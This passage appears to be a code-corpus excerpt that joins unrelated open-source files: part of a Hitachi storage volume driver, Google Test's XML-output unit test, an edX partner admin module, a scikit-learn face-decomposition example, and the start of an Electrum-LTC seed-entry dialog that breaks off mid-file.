for line in lines:
line = shlex.split(line)
if not line:
continue
if line[0] == "Port":
tmp_port = line[1]
continue
if port != tmp_port:
continue
if line[0][0:3].isdigit():
tmp_gid = int(line[0][0:3])
if re.match(basic_lib.NAME_PREFIX, line[0][4:]):
found_alias_part = True
if line[0][4:] == target_alias:
found_alias_full = True
continue
if line[0] == "iSCSI":
if line[3] == target_iqn:
gid = tmp_gid
break
else:
found_alias_part = False
if found_alias_full and gid is None:
msg = basic_lib.output_err(641)
raise exception.HBSDError(message=msg)
# A gid of 0 is falsy but still a valid group id, so the 'is not None'
# check cannot be replaced with a plain truthiness test.
if not found_alias_part and gid is not None:
msg = basic_lib.output_err(641)
raise exception.HBSDError(message=msg)
return gid
def comm_get_dp_pool(self, pool_id):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('audppool',
'-unit %s -refer -g' % unit,
printflag=False)
if ret:
msg = basic_lib.output_err(
600, cmd='audppool', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
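# Each pool line of the '-refer -g' output is expected to carry total and
# consumed capacity columns, e.g. (illustrative) '... 100.0 GB  30.0 GB ...',
# from which total_gb=100 and free_gb=100-30=70 would be derived.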
lines = stdout.splitlines()
for line in lines[2:]:
tc_cc = re.search(r'\s(\d+\.\d) GB\s+(\d+\.\d) GB\s', line)
pool_tmp = re.match(r'\s*\d+', line)
if (pool_tmp and tc_cc
and int(pool_tmp.group(0)) == pool_id):
total_gb = int(float(tc_cc.group(1)))
free_gb = total_gb - int(float(tc_cc.group(2)))
return total_gb, free_gb
msg = basic_lib.output_err(640, pool_id=pool_id)
raise exception.HBSDError(message=msg)
def is_detected(self, port, wwn):
hgs = []
self.comm_get_hostgroup_info(hgs, [wwn], [port], login=True)
return hgs[0]['detected']
def pairoperate(self, opr, pvol, svol, is_vvol, args=None):
unit = self.unit_name
method = '-ss' if is_vvol else '-si'
opt = '-unit %s -%s %s -pvol %d -svol %d' % (unit, opr, method,
pvol, svol)
if args:
opt = '%s %s' % (opt, args)
ret, stdout, stderr = self.exec_hsnm('aureplicationlocal', opt)
if ret:
opt = '%s %s' % ('aureplicationlocal', opt)
msg = basic_lib.output_err(
600, cmd=opt, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_create_pair(self, pvol, svol, is_vvol):
if not is_vvol:
args = '-compsplit -pace %s' % self.pace
method = basic_lib.FULL
else:
pool = self.conf.hitachi_thin_pool_id
args = ('-localrepdppoolno %d -localmngdppoolno %d '
'-compsplit -pace %s' % (pool, pool, self.pace))
method = basic_lib.THIN
try:
self.pairoperate('create', pvol, svol, is_vvol, args=args)
except exception.HBSDCmdError as ex:
if (re.search('DMER0300B8', ex.stderr)
or re.search('DMER0800CF', ex.stderr)
or re.search('DMER0800D[0-6D]', ex.stderr)
or re.search('DMER03006A', ex.stderr)
or re.search('DMER030080', ex.stderr)):
msg = basic_lib.output_err(615, copy_method=method, pvol=pvol)
raise exception.HBSDBusy(message=msg)
else:
raise
def _comm_pairevtwait(self, pvol, svol, is_vvol):
unit = self.unit_name
if not is_vvol:
pairname = 'SI_LU%04d_LU%04d' % (pvol, svol)
method = '-si'
else:
pairname = 'SS_LU%04d_LU%04d' % (pvol, svol)
method = '-ss'
opt = ('-unit %s -evwait %s -pairname %s -gname Ungrouped -nowait' %
(unit, method, pairname))
ret, stdout, stderr = self.exec_hsnm('aureplicationmon',
opt, noretry=True)
return ret
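# The two helpers below follow the FixedIntervalLoopingCall protocol:
# raising LoopingCallDone from the polled callback stops the loop (the pair
# reached one of the desired statuses), while exceeding 'timeout' raises an
# HBSDError instead.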
def _wait_for_pair_status(self, pvol, svol, is_vvol,
status, timeout, start):
if self._comm_pairevtwait(pvol, svol, is_vvol) in status:
raise loopingcall.LoopingCallDone()
if time.time() - start >= timeout:
msg = basic_lib.output_err(
637, method='_wait_for_pair_status', timeout=timeout)
raise exception.HBSDError(message=msg)
def comm_pairevtwait(self, pvol, svol, is_vvol, status, timeout, interval):
loop = loopingcall.FixedIntervalLoopingCall(
self._wait_for_pair_status, pvol, svol, is_vvol,
status, timeout, time.time())
loop.start(interval=interval).wait()
def delete_pair(self, pvol, svol, is_vvol):
self.pairoperate('simplex', pvol, svol, is_vvol)
def trans_status_hsnm2raid(self, status_str):
status = None
obj = re.search(r'Split\((.*)%\)', status_str)
if obj:
status = basic_lib.PSUS
obj = re.search(r'Paired\((.*)%\)', status_str)
if obj:
status = basic_lib.PAIR
return status
def get_paired_info(self, ldev, only_flag=False):
opt_base = '-unit %s -refer' % self.unit_name
if only_flag:
opt_base = '%s -ss' % opt_base
opt = '%s -pvol %d' % (opt_base, ldev)
ret, stdout, stderr = self.exec_hsnm('aureplicationlocal',
opt, noretry=True)
if ret == 0:
lines = stdout.splitlines()
pair_info = {'pvol': ldev, 'svol': []}
for line in lines[1:]:
status = self.trans_status_hsnm2raid(line)
if re.search('SnapShot', line[100:]):
is_vvol = True
else:
is_vvol = False
line = shlex.split(line)
if not line:
break
svol = int(line[2])
pair_info['svol'].append({'lun': svol,
'status': status,
'is_vvol': is_vvol})
return pair_info
opt = '%s -svol %d' % (opt_base, ldev)
ret, stdout, stderr = self.exec_hsnm('aureplicationlocal',
opt, noretry=True)
if ret == 1:
return {'pvol': None, 'svol': []}
lines = stdout.splitlines()
status = self.trans_status_hsnm2raid(lines[1])
if re.search('SnapShot', lines[1][100:]):
is_vvol = True
else:
is_vvol = False
line = shlex.split(lines[1])
pvol = int(line[1])
return {'pvol': pvol, 'svol': [{'lun': ldev,
'status': status,
'is_vvol': is_vvol}]}
def create_lock_file(self):
basic_lib.create_empty_file(self.hsnm_lock_file)
def get_hostgroup_luns(self, port, gid):
lun_list = []
self.add_used_hlun('auhgmap', port, gid, lun_list, DUMMY_LU)
return lun_list
def get_ldev_size_in_gigabyte(self, ldev, existing_ref):
param = 'unit_name'
if param not in existing_ref:
msg = basic_lib.output_err(700, param=param)
raise exception.HBSDError(data=msg)
storage = existing_ref.get(param)
if storage != self.conf.hitachi_unit_name:
msg = basic_lib.output_err(648, resource=param)
raise exception.HBSDError(data=msg)
try:
stdout = self._get_lu(ldev)
except exception.HBSDError:
with excutils.save_and_reraise_exception():
basic_lib.output_err(648, resource='LDEV')
lines = stdout.splitlines()
line = lines[2]
splits = shlex.split(line)
vol_type = splits[len(splits) - 1]
if basic_lib.NORMAL_VOLUME_TYPE != vol_type:
msg = basic_lib.output_err(702, ldev=ldev)
raise exception.HBSDError(data=msg)
dppool = splits[5]
if 'N/A' == dppool:
msg = basic_lib.output_err(702, ldev=ldev)
raise exception.HBSDError(data=msg)
# Hitachi storage calculates volume sizes in a block unit, 512 bytes.
# So, units.Gi is divided by 512.
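# Worked example: a 1 GiB LDEV reports size = units.Gi / 512 = 2097152
# blocks, which divides evenly, and this method then returns 1 (GB).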
size = int(splits[1])
if size % (units.Gi / 512):
msg = basic_lib.output_err(703, ldev=ldev)
raise exception.HBSDError(data=msg)
num_port = int(splits[len(splits) - 2])
if num_port:
msg = basic_lib.output_err(704, ldev=ldev)
raise exception.HBSDError(data=msg)
return size / (units.Gi / 512)
| apache-2.0 |
gitmogul/gmock | gtest/test/gtest_xml_output_unittest.py | 1815 | 14580 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for the gtest_xml_output module"""
__author__ = 'eefacm@gmail.com (Sean Mcafee)'
import datetime
import errno
import os
import re
import sys
from xml.dom import minidom, Node
import gtest_test_utils
import gtest_xml_test_utils
GTEST_FILTER_FLAG = '--gtest_filter'
GTEST_LIST_TESTS_FLAG = '--gtest_list_tests'
GTEST_OUTPUT_FLAG = "--gtest_output"
GTEST_DEFAULT_OUTPUT_FILE = "test_detail.xml"
GTEST_PROGRAM_NAME = "gtest_xml_output_unittest_"
SUPPORTS_STACK_TRACES = False
if SUPPORTS_STACK_TRACES:
STACK_TRACE_TEMPLATE = '\nStack trace:\n*'
else:
STACK_TRACE_TEMPLATE = ''
EXPECTED_NON_EMPTY_XML = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="23" failures="4" disabled="2" errors="0" time="*" timestamp="*" name="AllTests" ad_hoc_property="42">
<testsuite name="SuccessfulTest" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="Succeeds" status="run" time="*" classname="SuccessfulTest"/>
</testsuite>
<testsuite name="FailedTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="Fails" status="run" time="*" classname="FailedTest">
<failure message="gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="MixedResultTest" tests="3" failures="1" disabled="1" errors="0" time="*">
<testcase name="Succeeds" status="run" time="*" classname="MixedResultTest"/>
<testcase name="Fails" status="run" time="*" classname="MixedResultTest">
<failure message="gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1%(stack)s]]></failure>
<failure message="gtest_xml_output_unittest_.cc:*
Value of: 3
Expected: 2" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 3
Expected: 2%(stack)s]]></failure>
</testcase>
<testcase name="DISABLED_test" status="notrun" time="*" classname="MixedResultTest"/>
</testsuite>
<testsuite name="XmlQuotingTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="OutputsCData" status="run" time="*" classname="XmlQuotingTest">
<failure message="gtest_xml_output_unittest_.cc:*
Failed
XML output: <?xml encoding="utf-8"><top><![CDATA[cdata text]]></top>" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Failed
XML output: <?xml encoding="utf-8"><top><![CDATA[cdata text]]>]]><![CDATA[</top>%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="InvalidCharactersTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="InvalidCharactersInMessage" status="run" time="*" classname="InvalidCharactersTest">
<failure message="gtest_xml_output_unittest_.cc:*
Failed
Invalid characters in brackets []" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Failed
Invalid characters in brackets []%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="DisabledTest" tests="1" failures="0" disabled="1" errors="0" time="*">
<testcase name="DISABLED_test_not_run" status="notrun" time="*" classname="DisabledTest"/>
</testsuite>
<testsuite name="PropertyRecordingTest" tests="4" failures="0" disabled="0" errors="0" time="*" SetUpTestCase="yes" TearDownTestCase="aye">
<testcase name="OneProperty" status="run" time="*" classname="PropertyRecordingTest" key_1="1"/>
<testcase name="IntValuedProperty" status="run" time="*" classname="PropertyRecordingTest" key_int="1"/>
<testcase name="ThreeProperties" status="run" time="*" classname="PropertyRecordingTest" key_1="1" key_2="2" key_3="3"/>
<testcase name="TwoValuesForOneKeyUsesLastValue" status="run" time="*" classname="PropertyRecordingTest" key_1="2"/>
</testsuite>
<testsuite name="NoFixtureTest" tests="3" failures="0" disabled="0" errors="0" time="*">
<testcase name="RecordProperty" status="run" time="*" classname="NoFixtureTest" key="1"/>
<testcase name="ExternalUtilityThatCallsRecordIntValuedProperty" status="run" time="*" classname="NoFixtureTest" key_for_utility_int="1"/>
<testcase name="ExternalUtilityThatCallsRecordStringValuedProperty" status="run" time="*" classname="NoFixtureTest" key_for_utility_string="1"/>
</testsuite>
<testsuite name="Single/ValueParamTest" tests="4" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasValueParamAttribute/0" value_param="33" status="run" time="*" classname="Single/ValueParamTest" />
<testcase name="HasValueParamAttribute/1" value_param="42" status="run" time="*" classname="Single/ValueParamTest" />
<testcase name="AnotherTestThatHasValueParamAttribute/0" value_param="33" status="run" time="*" classname="Single/ValueParamTest" />
<testcase name="AnotherTestThatHasValueParamAttribute/1" value_param="42" status="run" time="*" classname="Single/ValueParamTest" />
</testsuite>
<testsuite name="TypedTest/0" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="TypedTest/0" />
</testsuite>
<testsuite name="TypedTest/1" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="TypedTest/1" />
</testsuite>
<testsuite name="Single/TypeParameterizedTestCase/0" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="Single/TypeParameterizedTestCase/0" />
</testsuite>
<testsuite name="Single/TypeParameterizedTestCase/1" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="Single/TypeParameterizedTestCase/1" />
</testsuite>
</testsuites>""" % {'stack': STACK_TRACE_TEMPLATE}
EXPECTED_FILTERED_TEST_XML = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="1" failures="0" disabled="0" errors="0" time="*"
timestamp="*" name="AllTests" ad_hoc_property="42">
<testsuite name="SuccessfulTest" tests="1" failures="0" disabled="0"
errors="0" time="*">
<testcase name="Succeeds" status="run" time="*" classname="SuccessfulTest"/>
</testsuite>
</testsuites>"""
EXPECTED_EMPTY_XML = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="0" failures="0" disabled="0" errors="0" time="*"
timestamp="*" name="AllTests">
</testsuites>"""
GTEST_PROGRAM_PATH = gtest_test_utils.GetTestExecutablePath(GTEST_PROGRAM_NAME)
SUPPORTS_TYPED_TESTS = 'TypedTest' in gtest_test_utils.Subprocess(
[GTEST_PROGRAM_PATH, GTEST_LIST_TESTS_FLAG], capture_stderr=False).output
class GTestXMLOutputUnitTest(gtest_xml_test_utils.GTestXMLTestCase):
"""
Unit test for Google Test's XML output functionality.
"""
# This test currently breaks on platforms that do not support typed and
# type-parameterized tests, so we don't run it under them.
if SUPPORTS_TYPED_TESTS:
def testNonEmptyXmlOutput(self):
"""
Runs a test program that generates a non-empty XML output, and
tests that the XML output is as expected.
"""
self._TestXmlOutput(GTEST_PROGRAM_NAME, EXPECTED_NON_EMPTY_XML, 1)
def testEmptyXmlOutput(self):
"""Verifies XML output for a Google Test binary without actual tests.
Runs a test program that generates an empty XML output, and
tests that the XML output is as expected.
"""
self._TestXmlOutput('gtest_no_test_unittest', EXPECTED_EMPTY_XML, 0)
def testTimestampValue(self):
"""Checks whether the timestamp attribute in the XML output is valid.
Runs a test program that generates an empty XML output, and checks if
the timestamp attribute in the testsuites tag is valid.
"""
actual = self._GetXmlOutput('gtest_no_test_unittest', [], 0)
date_time_str = actual.documentElement.getAttributeNode('timestamp').value
# datetime.strptime() is only available in Python 2.5+ so we have to
# parse the expected datetime manually.
match = re.match(r'(\d+)-(\d\d)-(\d\d)T(\d\d):(\d\d):(\d\d)', date_time_str)
self.assertTrue(
match,
'XML datetime string %s has incorrect format' % date_time_str)
date_time_from_xml = datetime.datetime(
year=int(match.group(1)), month=int(match.group(2)),
day=int(match.group(3)), hour=int(match.group(4)),
minute=int(match.group(5)), second=int(match.group(6)))
time_delta = abs(datetime.datetime.now() - date_time_from_xml)
# timestamp value should be near the current local time
self.assertTrue(time_delta < datetime.timedelta(seconds=600),
'time_delta is %s' % time_delta)
actual.unlink()
def testDefaultOutputFile(self):
"""
Confirms that Google Test produces an XML output file with the expected
default name if no name is explicitly specified.
"""
output_file = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_DEFAULT_OUTPUT_FILE)
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(
'gtest_no_test_unittest')
try:
os.remove(output_file)
except OSError, e:
if e.errno != errno.ENOENT:
raise
p = gtest_test_utils.Subprocess(
[gtest_prog_path, '%s=xml' % GTEST_OUTPUT_FLAG],
working_dir=gtest_test_utils.GetTempDir())
self.assert_(p.exited)
self.assertEquals(0, p.exit_code)
self.assert_(os.path.isfile(output_file))
def testSuppressedXmlOutput(self):
"""
Tests that no XML file is generated if the default XML listener is
shut down before RUN_ALL_TESTS is invoked.
"""
xml_path = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_PROGRAM_NAME + 'out.xml')
if os.path.isfile(xml_path):
os.remove(xml_path)
command = [GTEST_PROGRAM_PATH,
'%s=xml:%s' % (GTEST_OUTPUT_FLAG, xml_path),
'--shut_down_xml']
p = gtest_test_utils.Subprocess(command)
if p.terminated_by_signal:
# p.signal is available only if p.terminated_by_signal is True.
self.assertFalse(
p.terminated_by_signal,
'%s was killed by signal %d' % (GTEST_PROGRAM_NAME, p.signal))
else:
self.assert_(p.exited)
self.assertEquals(1, p.exit_code,
"'%s' exited with code %s, which doesn't match "
'the expected exit code %s.'
% (command, p.exit_code, 1))
self.assert_(not os.path.isfile(xml_path))
def testFilteredTestXmlOutput(self):
"""Verifies XML output when a filter is applied.
Runs a test program that executes only some tests and verifies that
non-selected tests do not show up in the XML output.
"""
self._TestXmlOutput(GTEST_PROGRAM_NAME, EXPECTED_FILTERED_TEST_XML, 0,
extra_args=['%s=SuccessfulTest.*' % GTEST_FILTER_FLAG])
def _GetXmlOutput(self, gtest_prog_name, extra_args, expected_exit_code):
"""
Returns the xml output generated by running the program gtest_prog_name.
Furthermore, the program's exit code must be expected_exit_code.
"""
xml_path = os.path.join(gtest_test_utils.GetTempDir(),
gtest_prog_name + 'out.xml')
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(gtest_prog_name)
command = ([gtest_prog_path, '%s=xml:%s' % (GTEST_OUTPUT_FLAG, xml_path)] +
extra_args)
p = gtest_test_utils.Subprocess(command)
if p.terminated_by_signal:
self.assert_(False,
'%s was killed by signal %d' % (gtest_prog_name, p.signal))
else:
self.assert_(p.exited)
self.assertEquals(expected_exit_code, p.exit_code,
"'%s' exited with code %s, which doesn't match "
'the expected exit code %s.'
% (command, p.exit_code, expected_exit_code))
actual = minidom.parse(xml_path)
return actual
def _TestXmlOutput(self, gtest_prog_name, expected_xml,
expected_exit_code, extra_args=None):
"""
Asserts that the XML document generated by running the program
gtest_prog_name matches expected_xml, a string containing another
XML document. Furthermore, the program's exit code must be
expected_exit_code.
"""
actual = self._GetXmlOutput(gtest_prog_name, extra_args or [],
expected_exit_code)
expected = minidom.parseString(expected_xml)
self.NormalizeXml(actual.documentElement)
self.AssertEquivalentNodes(expected.documentElement,
actual.documentElement)
expected.unlink()
actual.unlink()
if __name__ == '__main__':
os.environ['GTEST_STACK_TRACE_DEPTH'] = '1'
gtest_test_utils.Main()
| bsd-3-clause |
philanthropy-u/edx-platform | openedx/features/partners/admin.py | 1 | 1216 | from django.contrib import admin
from django.urls import reverse
from .models import Partner, PartnerCommunity, PartnerUser
class PartnerAdmin(admin.ModelAdmin):
"""
Django admin customizations for Partner model
"""
list_display = ('id', 'label', 'slug', 'partner_url')
readonly_fields = ('partner_url',)
def partner_url(self, obj):
if obj.slug:
return reverse('partner_url', kwargs={'slug': obj.slug})
class PartnerUserModelAdmin(admin.ModelAdmin):
"""
Django admin for verifying whether a user is affiliated with a partner after login or registration
"""
raw_id_fields = ('user',)
class PartnerCommunityModelAdmin(admin.ModelAdmin):
"""
Django admin model that attaches a community id to a partner so that every partner user is automatically added to that community
"""
list_display = ['id', 'partner', 'community_id']
search_fields = ('partner', 'community_id')
class Meta(object):
verbose_name = 'Partner Community'
verbose_name_plural = 'Partner Communities'
admin.site.register(Partner, PartnerAdmin)
admin.site.register(PartnerCommunity, PartnerCommunityModelAdmin)
admin.site.register(PartnerUser, PartnerUserModelAdmin)
| agpl-3.0 |
pypot/scikit-learn | examples/decomposition/plot_faces_decomposition.py | 204 | 4452 | """
============================
Faces dataset decompositions
============================
This example applies different unsupervised matrix decomposition
(dimension reduction) methods from the module
:py:mod:`sklearn.decomposition` to the :ref:`olivetti_faces` dataset
(see the documentation chapter :ref:`decompositions`).
"""
print(__doc__)
# Authors: Vlad Niculae, Alexandre Gramfort
# License: BSD 3 clause
import logging
from time import time
from numpy.random import RandomState
import matplotlib.pyplot as plt
from sklearn.datasets import fetch_olivetti_faces
from sklearn.cluster import MiniBatchKMeans
from sklearn import decomposition
# Display progress logs on stdout
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s')
n_row, n_col = 2, 3
n_components = n_row * n_col
image_shape = (64, 64)
rng = RandomState(0)
###############################################################################
# Load faces data
dataset = fetch_olivetti_faces(shuffle=True, random_state=rng)
faces = dataset.data
n_samples, n_features = faces.shape
# global centering
faces_centered = faces - faces.mean(axis=0)
# local centering
faces_centered -= faces_centered.mean(axis=1).reshape(n_samples, -1)
print("Dataset consists of %d faces" % n_samples)
###############################################################################
def plot_gallery(title, images, n_col=n_col, n_row=n_row):
plt.figure(figsize=(2. * n_col, 2.26 * n_row))
plt.suptitle(title, size=16)
for i, comp in enumerate(images):
plt.subplot(n_row, n_col, i + 1)
vmax = max(comp.max(), -comp.min())
plt.imshow(comp.reshape(image_shape), cmap=plt.cm.gray,
interpolation='nearest',
vmin=-vmax, vmax=vmax)
plt.xticks(())
plt.yticks(())
plt.subplots_adjust(0.01, 0.05, 0.99, 0.93, 0.04, 0.)
###############################################################################
# List of the different estimators, whether to center and transpose the
# problem, and whether the transformer uses the clustering API.
estimators = [
('Eigenfaces - RandomizedPCA',
decomposition.RandomizedPCA(n_components=n_components, whiten=True),
True),
('Non-negative components - NMF',
decomposition.NMF(n_components=n_components, init='nndsvda', beta=5.0,
tol=5e-3, sparseness='components'),
False),
('Independent components - FastICA',
decomposition.FastICA(n_components=n_components, whiten=True),
True),
('Sparse comp. - MiniBatchSparsePCA',
decomposition.MiniBatchSparsePCA(n_components=n_components, alpha=0.8,
n_iter=100, batch_size=3,
random_state=rng),
True),
('MiniBatchDictionaryLearning',
decomposition.MiniBatchDictionaryLearning(n_components=15, alpha=0.1,
n_iter=50, batch_size=3,
random_state=rng),
True),
('Cluster centers - MiniBatchKMeans',
MiniBatchKMeans(n_clusters=n_components, tol=1e-3, batch_size=20,
max_iter=50, random_state=rng),
True),
('Factor Analysis components - FA',
decomposition.FactorAnalysis(n_components=n_components, max_iter=2),
True),
]
###############################################################################
# Plot a sample of the input data
plot_gallery("First centered Olivetti faces", faces_centered[:n_components])
###############################################################################
# Do the estimation and plot it
for name, estimator, center in estimators:
print("Extracting the top %d %s..." % (n_components, name))
t0 = time()
data = faces
if center:
data = faces_centered
estimator.fit(data)
train_time = (time() - t0)
print("done in %0.3fs" % train_time)
if hasattr(estimator, 'cluster_centers_'):
components_ = estimator.cluster_centers_
else:
components_ = estimator.components_
if hasattr(estimator, 'noise_variance_'):
plot_gallery("Pixelwise variance",
estimator.noise_variance_.reshape(1, -1), n_col=1,
n_row=1)
plot_gallery('%s - Train time %.1fs' % (name, train_time),
components_[:n_components])
plt.show()
| bsd-3-clause |
vialectrum/vialectrum | electrum_ltc/gui/qt/seed_dialog.py | 1 | 9848 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import (QVBoxLayout, QCheckBox, QHBoxLayout, QLineEdit,
QLabel, QCompleter, QDialog, QStyledItemDelegate)
from electrum_ltc.i18n import _
from electrum_ltc.mnemonic import Mnemonic, seed_type
from electrum_ltc import old_mnemonic
from .util import (Buttons, OkButton, WWLabel, ButtonsTextEdit, icon_path,
EnterButton, CloseButton, WindowModalDialog, ColorScheme)
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .completion_text_edit import CompletionTextEdit
def seed_warning_msg(seed):
return ''.join([
"<p>",
_("Please save these {0} words on paper (order is important). "),
_("This seed will allow you to recover your wallet in case "
"of computer failure."),
"</p>",
"<b>" + _("WARNING") + ":</b>",
"<ul>",
"<li>" + _("Never disclose your seed.") + "</li>",
"<li>" + _("Never type it on a website.") + "</li>",
"<li>" + _("Do not store it electronically.") + "</li>",
"</ul>"
]).format(len(seed.split()))
class SeedLayout(QVBoxLayout):
def seed_options(self):
dialog = QDialog()
vbox = QVBoxLayout(dialog)
if 'ext' in self.options:
cb_ext = QCheckBox(_('Extend this seed with custom words'))
cb_ext.setChecked(self.is_ext)
vbox.addWidget(cb_ext)
if 'bip39' in self.options:
def f(b):
self.is_seed = (lambda x: bool(x)) if b else self.saved_is_seed
self.is_bip39 = b
self.on_edit()
if b:
msg = ' '.join([
'<b>' + _('Warning') + ':</b> ',
_('BIP39 seeds can be imported in Electrum, so that users can access funds locked in other wallets.'),
_('However, we do not generate BIP39 seeds, because they do not meet our safety standard.'),
_('BIP39 seeds do not include a version number, which compromises compatibility with future software.'),
_('We do not guarantee that BIP39 imports will always be supported in Electrum.'),
])
else:
msg = ''
self.seed_warning.setText(msg)
cb_bip39 = QCheckBox(_('BIP39 seed'))
cb_bip39.toggled.connect(f)
cb_bip39.setChecked(self.is_bip39)
vbox.addWidget(cb_bip39)
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
self.is_ext = cb_ext.isChecked() if 'ext' in self.options else False
self.is_bip39 = cb_bip39.isChecked() if 'bip39' in self.options else False
def __init__(self, seed=None, title=None, icon=True, msg=None, options=None,
is_seed=None, passphrase=None, parent=None, for_seed_words=True):
QVBoxLayout.__init__(self)
self.parent = parent
self.options = options
if title:
self.addWidget(WWLabel(title))
if seed: # "read only", we already have the text
if for_seed_words:
self.seed_e = ButtonsTextEdit()
else: # e.g. xpub
self.seed_e = ShowQRTextEdit()
self.seed_e.setReadOnly(True)
self.seed_e.setText(seed)
else: # we expect user to enter text
assert for_seed_words
self.seed_e = CompletionTextEdit()
self.seed_e.setTabChangesFocus(False) # so that tab auto-completes
self.is_seed = is_seed
self.saved_is_seed = self.is_seed
self.seed_e.textChanged.connect(self.on_edit)
self.initialize_completer()
self.seed_e.setMaximumHeight(75)
hbox = QHBoxLayout()
if icon:
logo = QLabel()
logo.setPixmap(QPixmap(icon_path("seed.png"))
.scaledToWidth(64, mode=Qt.SmoothTransformation))
logo.setMaximumWidth(60)
hbox.addWidget(logo)
hbox.addWidget(self.seed_e)
self.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addStretch(1)
self.seed_type_label = QLabel('')
hbox.addWidget(self.seed_type_label)
# options
self.is_bip39 = False
self.is_ext = False
if options:
opt_button = EnterButton(_('Options'), self.seed_options)
hbox.addWidget(opt_button)
self.addLayout(hbox)
if passphrase:
hbox = QHBoxLayout()
passphrase_e = QLineEdit()
passphrase_e.setText(passphrase)
passphrase_e.setReadOnly(True)
hbox.addWidget(QLabel(_("Your seed extension is") + ':'))
hbox.addWidget(passphrase_e)
self.addLayout(hbox)
self.addStretch(1)
self.seed_warning = WWLabel('')
if msg:
self.seed_warning.setText(seed_warning_msg(seed))
self.addWidget(self.seed_warning)
def initialize_completer(self):
bip39_english_list = Mnemonic('en').wordlist
old_list = old_mnemonic.wordlist
only_old_list = set(old_list) - set(bip39_english_list)
self.wordlist = list(bip39_english_list) + list(only_old_list) # concat both lists
self.wordlist.sort()
class CompleterDelegate(QStyledItemDelegate):
def initStyleOption(self, option, index):
super().initStyleOption(option, index)
# Some people complained that due to merging the two word lists,
# it is difficult to restore from a metal backup, as they planned
